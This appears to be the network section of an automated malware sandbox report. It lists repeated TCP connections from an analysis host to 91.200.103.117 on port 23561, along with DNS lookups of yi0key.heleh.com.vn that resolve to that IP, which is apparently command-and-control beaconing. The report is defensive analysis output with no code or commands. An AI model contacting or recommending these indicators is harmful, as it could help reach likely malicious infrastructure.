                              Oct 7, 2024 16:24:12.432125092 CEST235616002691.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:15.437334061 CEST6002823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:15.442307949 CEST235616002891.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:15.442361116 CEST6002823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:15.442945957 CEST6002823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:15.447715044 CEST235616002891.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:17.141319990 CEST235616002891.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:17.141603947 CEST6002823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:17.146414042 CEST235616002891.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:18.151138067 CEST6003023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:18.156042099 CEST235616003091.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:18.156142950 CEST6003023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:18.156728983 CEST6003023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:18.161494017 CEST235616003091.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:19.758491039 CEST235616003091.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:19.760449886 CEST6003023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:19.765355110 CEST235616003091.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:21.776551962 CEST6003223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:21.781466961 CEST235616003291.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:21.781631947 CEST6003223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:21.784212112 CEST6003223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:21.788935900 CEST235616003291.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:23.401499033 CEST235616003291.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:23.401724100 CEST6003223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:23.406691074 CEST235616003291.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:32.789669037 CEST6003423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:32.794408083 CEST235616003491.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:32.794461966 CEST6003423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:32.795047998 CEST6003423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:32.799797058 CEST235616003491.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:34.395739079 CEST235616003491.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:34.395901918 CEST6003423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:34.400850058 CEST235616003491.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:43.407588005 CEST6003623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:43.412518024 CEST235616003691.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:43.412569046 CEST6003623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:43.413248062 CEST6003623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:43.418231010 CEST235616003691.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:45.043955088 CEST235616003691.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:45.044100046 CEST6003623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:45.044100046 CEST6003623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:45.048938990 CEST235616003691.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:49.055422068 CEST6003823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:49.060698986 CEST235616003891.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:49.060808897 CEST6003823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:49.061773062 CEST6003823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:49.066864014 CEST235616003891.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:50.768790007 CEST235616003891.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:50.768951893 CEST6003823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:50.773803949 CEST235616003891.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:52.782180071 CEST6004023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:52.787024975 CEST235616004091.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:52.787111998 CEST6004023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:52.790287018 CEST6004023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:52.795082092 CEST235616004091.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:54.401439905 CEST235616004091.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:54.401612043 CEST6004023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:54.406414032 CEST235616004091.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:59.412154913 CEST6004223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:59.416986942 CEST235616004291.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:59.417081118 CEST6004223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:59.417907953 CEST6004223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:59.422909021 CEST235616004291.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:01.058278084 CEST235616004291.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:01.058619976 CEST6004223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:01.063472033 CEST235616004291.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:08.080708981 CEST6004423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:08.086767912 CEST235616004491.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:08.086832047 CEST6004423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:08.087656975 CEST6004423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:08.093493938 CEST235616004491.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:09.750983953 CEST235616004491.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:09.751563072 CEST6004423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:09.756335020 CEST235616004491.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:12.762860060 CEST6004623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:12.767757893 CEST235616004691.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:12.767818928 CEST6004623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:12.768388987 CEST6004623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:12.773225069 CEST235616004691.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:14.386382103 CEST235616004691.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:14.386615038 CEST6004623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:14.391479015 CEST235616004691.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:22.396341085 CEST6004823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:22.401190042 CEST235616004891.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:22.401241064 CEST6004823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:22.401937008 CEST6004823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:22.407319069 CEST235616004891.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:24.044132948 CEST235616004891.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:24.044312000 CEST6004823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:24.049165010 CEST235616004891.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:25.053244114 CEST6005023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:25.058274984 CEST235616005091.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:25.058372974 CEST6005023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:25.059437990 CEST6005023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:25.064352036 CEST235616005091.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:26.697621107 CEST235616005091.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:26.697889090 CEST6005023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:26.702714920 CEST235616005091.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:33.707356930 CEST6005223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:33.712356091 CEST235616005291.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:33.712430954 CEST6005223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:33.713551998 CEST6005223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:33.718729973 CEST235616005291.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:35.352093935 CEST235616005291.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:35.352552891 CEST6005223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:35.357487917 CEST235616005291.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:43.362433910 CEST6005423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:43.367542028 CEST235616005491.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:43.367609024 CEST6005423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:43.368163109 CEST6005423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:43.373070955 CEST235616005491.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:44.995366096 CEST235616005491.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:44.995624065 CEST6005423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:45.000652075 CEST235616005491.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:51.007087946 CEST6005623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:51.011991978 CEST235616005691.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:51.012062073 CEST6005623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:51.012679100 CEST6005623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:51.019509077 CEST235616005691.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:52.638153076 CEST235616005691.200.103.117192.168.2.13
                              Oct 7, 2024 16:25:52.638293028 CEST6005623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:25:52.643152952 CEST235616005691.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:02.648556948 CEST6005823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:02.654529095 CEST235616005891.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:02.654598951 CEST6005823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:02.655536890 CEST6005823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:02.661057949 CEST235616005891.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:04.334763050 CEST235616005891.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:04.334819078 CEST6005823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:04.339747906 CEST235616005891.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:12.346317053 CEST6006023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:12.351427078 CEST235616006091.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:12.351509094 CEST6006023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:12.352463961 CEST6006023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:12.360301018 CEST235616006091.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:13.978365898 CEST235616006091.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:13.978595018 CEST6006023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:13.983611107 CEST235616006091.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:19.438751936 CEST6006223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:19.444695950 CEST235616006291.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:19.444753885 CEST6006223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:19.445450068 CEST6006223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:19.451320887 CEST235616006291.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:21.056092978 CEST235616006291.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:21.056353092 CEST6006223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:21.061939001 CEST235616006291.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:29.067943096 CEST6006423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:29.072843075 CEST235616006491.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:29.072930098 CEST6006423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:29.074584961 CEST6006423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:29.079468966 CEST235616006491.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:30.687489986 CEST235616006491.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:30.687935114 CEST6006423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:30.692795038 CEST235616006491.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:39.699177027 CEST6006623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:39.704014063 CEST235616006691.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:39.704088926 CEST6006623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:39.705358028 CEST6006623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:39.710421085 CEST235616006691.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:41.371448994 CEST235616006691.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:41.371629000 CEST6006623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:41.377197981 CEST235616006691.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:46.286875010 CEST6006823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:46.291831017 CEST235616006891.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:46.291882038 CEST6006823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:46.292582035 CEST6006823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:46.297641993 CEST235616006891.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:47.931230068 CEST235616006891.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:47.931412935 CEST6006823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:47.936336040 CEST235616006891.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:48.942719936 CEST6007023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:48.947576046 CEST235616007091.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:48.947649002 CEST6007023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:48.948299885 CEST6007023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:48.953095913 CEST235616007091.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:50.561278105 CEST235616007091.200.103.117192.168.2.13
                              Oct 7, 2024 16:26:50.561439991 CEST6007023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:26:50.566416025 CEST235616007091.200.103.117192.168.2.13
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 7, 2024 16:23:18.959438086 CEST5870653192.168.2.138.8.8.8
                              Oct 7, 2024 16:23:18.970434904 CEST53587068.8.8.8192.168.2.13
                              Oct 7, 2024 16:23:23.664307117 CEST5354953192.168.2.138.8.8.8
                              Oct 7, 2024 16:23:23.685204983 CEST53535498.8.8.8192.168.2.13
                              Oct 7, 2024 16:23:28.337416887 CEST5358153192.168.2.138.8.8.8
                              Oct 7, 2024 16:23:28.344995022 CEST53535818.8.8.8192.168.2.13
                              Oct 7, 2024 16:23:35.976670980 CEST4630553192.168.2.138.8.8.8
                              Oct 7, 2024 16:23:35.983900070 CEST53463058.8.8.8192.168.2.13
                              Oct 7, 2024 16:23:47.655847073 CEST3306953192.168.2.138.8.8.8
                              Oct 7, 2024 16:23:47.813662052 CEST53330698.8.8.8192.168.2.13
                              Oct 7, 2024 16:23:56.432877064 CEST3539853192.168.2.138.8.8.8
                              Oct 7, 2024 16:23:56.440123081 CEST53353988.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:08.099666119 CEST3311553192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:08.107064962 CEST53331158.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:10.710761070 CEST4126953192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:10.721393108 CEST53412698.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:15.429326057 CEST5529453192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:15.436945915 CEST53552948.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:18.143685102 CEST5830253192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:18.150753021 CEST53583028.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:21.766969919 CEST5695253192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:21.773927927 CEST53569528.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:32.404035091 CEST3649053192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:32.788969040 CEST53364908.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:43.397604942 CEST5895153192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:43.407041073 CEST53589518.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:49.046722889 CEST5493453192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:49.054338932 CEST53549348.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:52.771466970 CEST3804053192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:52.781723022 CEST53380408.8.8.8192.168.2.13
                              Oct 7, 2024 16:24:59.404542923 CEST5926653192.168.2.138.8.8.8
                              Oct 7, 2024 16:24:59.411583900 CEST53592668.8.8.8192.168.2.13
                              Oct 7, 2024 16:25:08.060456038 CEST4497253192.168.2.138.8.8.8
                              Oct 7, 2024 16:25:08.080157995 CEST53449728.8.8.8192.168.2.13
                              Oct 7, 2024 16:25:12.755280018 CEST4522953192.168.2.138.8.8.8
                              Oct 7, 2024 16:25:12.762293100 CEST53452298.8.8.8192.168.2.13
                              Oct 7, 2024 16:25:22.388566017 CEST6086253192.168.2.138.8.8.8
                              Oct 7, 2024 16:25:22.395881891 CEST53608628.8.8.8192.168.2.13
                              Oct 7, 2024 16:25:25.045933008 CEST4888453192.168.2.138.8.8.8
                              Oct 7, 2024 16:25:25.052839041 CEST53488848.8.8.8192.168.2.13
                              Oct 7, 2024 16:25:33.699354887 CEST4565253192.168.2.138.8.8.8
                              Oct 7, 2024 16:25:33.706976891 CEST53456528.8.8.8192.168.2.13
                              Oct 7, 2024 16:25:43.354857922 CEST3953853192.168.2.138.8.8.8
                              Oct 7, 2024 16:25:43.362080097 CEST53395388.8.8.8192.168.2.13
                              Oct 7, 2024 16:25:50.998317957 CEST4540153192.168.2.138.8.8.8
                              Oct 7, 2024 16:25:51.006279945 CEST53454018.8.8.8192.168.2.13
                              Oct 7, 2024 16:26:02.640887976 CEST4360953192.168.2.138.8.8.8
                              Oct 7, 2024 16:26:02.648025036 CEST53436098.8.8.8192.168.2.13
                              Oct 7, 2024 16:26:04.193520069 CEST4670953192.168.2.131.1.1.1
                              Oct 7, 2024 16:26:04.193579912 CEST5430653192.168.2.131.1.1.1
                              Oct 7, 2024 16:26:04.201420069 CEST53543061.1.1.1192.168.2.13
                              Oct 7, 2024 16:26:04.201644897 CEST53467091.1.1.1192.168.2.13
                              Oct 7, 2024 16:26:12.337531090 CEST5325853192.168.2.138.8.8.8
                              Oct 7, 2024 16:26:12.345773935 CEST53532588.8.8.8192.168.2.13
                              Oct 7, 2024 16:26:18.981430054 CEST4133053192.168.2.138.8.8.8
                              Oct 7, 2024 16:26:19.438148975 CEST53413308.8.8.8192.168.2.13
                              Oct 7, 2024 16:26:29.059652090 CEST4851053192.168.2.138.8.8.8
                              Oct 7, 2024 16:26:29.067174911 CEST53485108.8.8.8192.168.2.13
                              Oct 7, 2024 16:26:39.691375971 CEST5248853192.168.2.138.8.8.8
                              Oct 7, 2024 16:26:39.698496103 CEST53524888.8.8.8192.168.2.13
                              Oct 7, 2024 16:26:45.374300957 CEST5494353192.168.2.138.8.8.8
                              Oct 7, 2024 16:26:46.285931110 CEST53549438.8.8.8192.168.2.13
                              Oct 7, 2024 16:26:48.934211969 CEST4898053192.168.2.138.8.8.8
                              Oct 7, 2024 16:26:48.942029953 CEST53489808.8.8.8192.168.2.13
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Oct 7, 2024 16:23:18.959438086 CEST192.168.2.138.8.8.80xdc8cStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:23.664307117 CEST192.168.2.138.8.8.80xf693Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:28.337416887 CEST192.168.2.138.8.8.80x6cf5Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:35.976670980 CEST192.168.2.138.8.8.80xa516Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:47.655847073 CEST192.168.2.138.8.8.80x98f9Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:56.432877064 CEST192.168.2.138.8.8.80x14b9Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:08.099666119 CEST192.168.2.138.8.8.80x6d7aStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:10.710761070 CEST192.168.2.138.8.8.80xab4aStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:15.429326057 CEST192.168.2.138.8.8.80xd3dStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:18.143685102 CEST192.168.2.138.8.8.80x27edStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:21.766969919 CEST192.168.2.138.8.8.80xa25Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:32.404035091 CEST192.168.2.138.8.8.80x412bStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:43.397604942 CEST192.168.2.138.8.8.80xf12bStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:49.046722889 CEST192.168.2.138.8.8.80xf3bdStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:52.771466970 CEST192.168.2.138.8.8.80x4befStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:59.404542923 CEST192.168.2.138.8.8.80xc559Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:08.060456038 CEST192.168.2.138.8.8.80x5539Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:12.755280018 CEST192.168.2.138.8.8.80x8a9aStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:22.388566017 CEST192.168.2.138.8.8.80x7e13Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:25.045933008 CEST192.168.2.138.8.8.80xda65Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:33.699354887 CEST192.168.2.138.8.8.80xd2c1Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:43.354857922 CEST192.168.2.138.8.8.80xff4bStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:50.998317957 CEST192.168.2.138.8.8.80x6d4aStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:02.640887976 CEST192.168.2.138.8.8.80x81dStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:04.193520069 CEST192.168.2.131.1.1.10x787aStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:04.193579912 CEST192.168.2.131.1.1.10xeddbStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                              Oct 7, 2024 16:26:12.337531090 CEST192.168.2.138.8.8.80x5f02Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:18.981430054 CEST192.168.2.138.8.8.80x7925Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:29.059652090 CEST192.168.2.138.8.8.80xcd0dStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:39.691375971 CEST192.168.2.138.8.8.80xb1dcStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:45.374300957 CEST192.168.2.138.8.8.80x6625Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              Oct 7, 2024 16:26:48.934211969 CEST192.168.2.138.8.8.80x3c47Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Oct 7, 2024 16:23:18.970434904 CEST8.8.8.8192.168.2.130xdc8cNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:23.685204983 CEST8.8.8.8192.168.2.130xf693No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:28.344995022 CEST8.8.8.8192.168.2.130x6cf5No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:35.983900070 CEST8.8.8.8192.168.2.130xa516No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:47.813662052 CEST8.8.8.8192.168.2.130x98f9No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:23:56.440123081 CEST8.8.8.8192.168.2.130x14b9No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:08.107064962 CEST8.8.8.8192.168.2.130x6d7aNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:10.721393108 CEST8.8.8.8192.168.2.130xab4aNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:15.436945915 CEST8.8.8.8192.168.2.130xd3dNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:18.150753021 CEST8.8.8.8192.168.2.130x27edNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:21.773927927 CEST8.8.8.8192.168.2.130xa25No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:32.788969040 CEST8.8.8.8192.168.2.130x412bNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:43.407041073 CEST8.8.8.8192.168.2.130xf12bNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:49.054338932 CEST8.8.8.8192.168.2.130xf3bdNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:52.781723022 CEST8.8.8.8192.168.2.130x4befNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:24:59.411583900 CEST8.8.8.8192.168.2.130xc559No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:08.080157995 CEST8.8.8.8192.168.2.130x5539No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:12.762293100 CEST8.8.8.8192.168.2.130x8a9aNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:22.395881891 CEST8.8.8.8192.168.2.130x7e13No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:25.052839041 CEST8.8.8.8192.168.2.130xda65No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:33.706976891 CEST8.8.8.8192.168.2.130xd2c1No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:43.362080097 CEST8.8.8.8192.168.2.130xff4bNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                              Oct 7, 2024 16:25:51.006279945 CEST8.8.8.8192.168.2.130x6d4aNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
